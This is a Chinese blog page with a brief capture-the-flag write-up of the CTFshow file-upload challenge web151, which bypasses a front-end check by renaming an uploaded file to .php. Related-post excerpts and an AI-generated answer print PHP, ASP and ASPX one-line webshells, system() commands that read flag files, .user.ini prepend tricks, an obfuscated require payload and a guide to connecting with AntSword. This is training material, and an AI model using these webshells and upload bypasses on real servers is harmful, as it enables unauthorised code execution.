CTFshow 文件上传 web151

最新推荐文章于 2024-07-07 12:27:30 发布
最新推荐文章于 2024-07-07 12:27:30 发布
阅读量282 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: CTFshow 文章标签: 前端 javascript 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Kracxi/article/details/122904844
本文解析了一段前端代码,演示了如何通过JavaScript校验绕过,将上传的图片文件名修改为.php,进而实现远程代码执行(RCE)。简单操作揭示了前端验证的重要性及其潜在风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

源码

<script>
layui.use('upload', function(){
  var upload = layui.upload;
   
  //执行实例
  var uploadInst = upload.render({
    elem: '#upload' //绑定元素
    ,url: '/upload/' //上传接口
    ,done: function(res){
    	if(res.code==0){
    		$("#result").html("文件上传成功,路径:"+res.msg);
    	}else{
    		$("#result").html("文件上传失败,失败原因:"+res.msg);
    	}
      
    }
    ,error: function(){
      $("#result").html("文件上传失败");
    }
  });
});
</script>

思路

有前端验证,常规手段是禁用js或者直接发送数据包

题解

根据js校验上传png,用bp改文件名为php

在这里插入图片描述
跟着提示访问文件,显示phpinfo页面,直接RCE

总结

水题

CTFshow-文件上传web151-160
qq_52579508的博客
08-12 561
提示前端校验不可靠抓包改 后缀webshell连接获取flag。
CTFshow 文件上传 Web151-170复现笔记(保姆级复现
2401_83728643的博客
12-31 1563
ctfshow文件上传复现保姆级笔记
ctfshow [web] 文件上传 151--155
weixin_68906365的博客
02-18 578
ctfshow文件上传151--155
ctfshow文件上传web151
m0_62584974的博客
04-05 1192
2022/4/5 先写一个一句话木马文件 <?php eval($_POST[1]); ?> 试着上传php木马文件 上传失败 查看源码发现只能上传png文件 把它改成php 上传我们刚刚写的木马文件 访问我们刚刚上传的文件 利用Hackbar用post的方式提交 1=system("ls /"); 没有发现flag的文件 查看上一层的目录用post的形式提交 1=system("ls ../"); 发现...
ctfshow-web入门-文件上传web151-web160)
Welcome To Myon'Blog !
07-07 2235
试了下前端只能传 png 后缀的将一句话木马改成 png 后缀,上传后用 burpsuite 抓包绕过前端检测后,改回 php 后缀,发包拿到 flag:ctfshow{e3bd0332-4d5f-4255-941f-a2e6095c4f17}我们还可以直接改它前端验证的代码:原本只支持上传 png 后缀的文件我们加一个 php 后缀进去,即可直接上传 php 后缀的文件。
CTFSHOW 文件上传 151-170
Landasika的博客
05-17 650
预备知识 1、一句话木马: php:<?php @eval($_post['pass']);?> asp:<%eval request ("pass")%> aspx:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> phtml:GIF89a? ...
CTFshow文件上传web入门151关-161关解密。包教包会!!!!
2301_77578012的博客
05-23 1557
当网站进行扫描时,会将.user.ini文件指向路径内容包含在首页代码处(如index.php、index.html等),使用参数auto_prepend_file(包含至首页文件头部)和auto_append_file(包含在首页文件尾部)进行配置。发送一句话木马,修改content-type值为:image/png,此处注意一下,我直接上传.php文件发现无法通过,定睛一看才发现前端验证还没关,汗颜!上传1.png的木马。2.上传.user.ini文件(使用bp中repaeater重发器功能进行上传)
CTFshow 文件上传 web163
Kradress的博客
02-16 774
目录源码思路总结 源码 思路 先上传.user.ini 上传成功 GIF89a auto_prepend_file=png 然后上传png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%d6%c4%c0%c1?> 取反脚本 $a = "dat
CTFshow 文件上传 web162
Kradress的博客
02-15 2302
目录思路总结 思路 大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过 .user.ini GIF89a auto_prepend_file=png png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%
CTFSHOW文件上传151-170
qq_68233961的博客
02-26 1404
CTFshow文件上传
ctfshow-web151,web152(文件上传)
m0_62094846的博客
01-17 2213
web151 这题如果关闭js文件就无法上传,无法通过绕过前台校验的方式进行 就上传png文件抓包后改成php web152 上传png文件抓包后改成php
CTFSHOW系列-web151(文件上传-js前端验证)
SuperherRo的博客
12-07 735
CTFSHOW系列解题思路
CTFshowweb151~160---文件上传(上)
金 帛的博客
06-02 3180
ctfshow的wp
CTFShow web151-170 (文件上传)
lonmar的博客
12-02 5871
web151 前端检测类型,burp抓包修改文件名称即可 文件上传思路,先上传一张图片马,再慢慢测试过滤规则(文件名,之类的) web152 思路和前面的一致 web153 上传.user.ini配置文件 原理:https://www.dazhuanlan.com/2020/03/08/5e641cbc397c2/ 防挂 https://www.cnblogs.com/l0nmar/p/14053889.html 发现很容易上传如php5,phtml等类型文件,但是不解析.通过插件识别为ngin
ctfshowweb151-160
akxnxbshai的博客
02-04 2013
目录 Web 151-152 Web 153 Web 154 Web 155 Web 156 Web 157-159 Web 160 Web 151-152 直接上传文件,然后抓包改后缀 再用蚁剑连一下,找到flag即可 Web 153 php文件无法上传。 发现服务器是nginx,考点是上传.user.ini配置文件,upload文件夹自带一个index.php,使其预加载木马 先后上传文件.user.ini和1.txt(注意抓包改名称) 两个上传后访问/uplo
CTFshow_Web_文件上传——web151~web170
Ho1aAs‘s Blog
04-26 2744
文章目录工具题解Web 151~152Web 153Web 154Web 155Web 156Web 157~158Web 159Web 160Web 161Web 162Web 163Web 164Web 165Web 166Web 167Web 168~170完 工具 Burpsuite php 题解 Web 151~152 页面上,伪装成jpg的一句话木马无法上传,提示前后端验证 抓包,修改filename为xxx.php,MIME类型image/png 读取flag直接用通配符 # 151.ph
Ctfshow web入门 PHP特性篇 web89-web151
Jay17的博客
07-10 2501
Ctfshow web入门 PHP特性篇 web89-web151web入门 PHP特性篇的wp都一把梭哈在这里啦~ 有点多,师傅们可以收藏下来慢慢看,写的应该挺全面的叭..... 有错误敬请斧正!
ctfshow文件上传web151-170wp
weixin_51614272的博客
02-26 2803
文件上传web151-170web1511.编写一句话木马上传2.修改前端验证3.在蚁剑上找flagweb1521.修改前端验证2.burp抓包后修改MIME3.在蚁剑上找flagweb1531.修改前端验证2.上传ini配置文件3.上传1.txt文件4.在蚁剑上找flagweb154 web155 web156 web157 web1581.修改前端验证2.上传ini配置文件3.上传1.txt文件4.在蚁剑上找flagweb159日志包含漏洞web160 web151 1.编写一句话木马上传 发现前端
ctfshow 文件上传 web151~170
shinygod的博客
03-22 1499
目录web151web 152web 153web 154web 155web 156 web151 上传提示,前端验证 上传.jpg文件然后抓包,改文件名为.php,加入一句话木马。 upload/1.php?1=system("cat /var/www/html/flag.php"); web 152 同上,但对Content-Type进行了过滤。 upload/1.php?1=system("cat /var/www/html/flag.php"); web 153 过滤了php,大小写改一
ctfshow web入门文件上传蚁剑连接
最新发布
01-02
### CTFShow Web 入门 文件上传 蚁剑 (AntSword) 连接教程 #### 准备工作 为了成功完成文件上传并利用蚁剑建立连接,需先准备环境。确保已安装蚁剑客户端,并准备好用于测试的恶意PHP脚本。 #### PHP Shell Payload 创建 创建一个简单的PHP反向Shell脚本 `shell.php`: ```php <?php @eval($_POST['cmd']);?> ``` 此代码片段允许通过POST请求执行任意命令[^1]。 #### 文件上传过程 使用给定URL进行文件上传操作。假设目标地址为 `http://example.com/upload` ,则可构造如下表单数据提交至服务器: ```html <form action="http://example.com/upload" method="post" enctype="multipart/form-data"> Select file to upload: <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" value="Upload File" name="submit"> </form> ``` 将之前编写的 `shell.php` 作为待上传文件选择并提交[^2]。 #### 验证上传成果 确认文件是否成功上载到远程服务器指定目录下。通常情况下,可以通过浏览器直接访问该路径来验证,例如:`http://example.com/uploads/shell.php` 。如果页面返回空白,则说明上传成功。 #### 使用蚁剑连接 启动蚁剑工具,在新建站点时输入相应的参数配置: - **网站根目录**: `/var/www/html/` - **WebShell URL**: 如前所述成功的PHP shell链接 - **密码**: 设置于PHP代码中的密钥 (`cmd`) 按照上述设置完成后点击“保存”,随后即可尝试与远端服务器建立会话连接[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值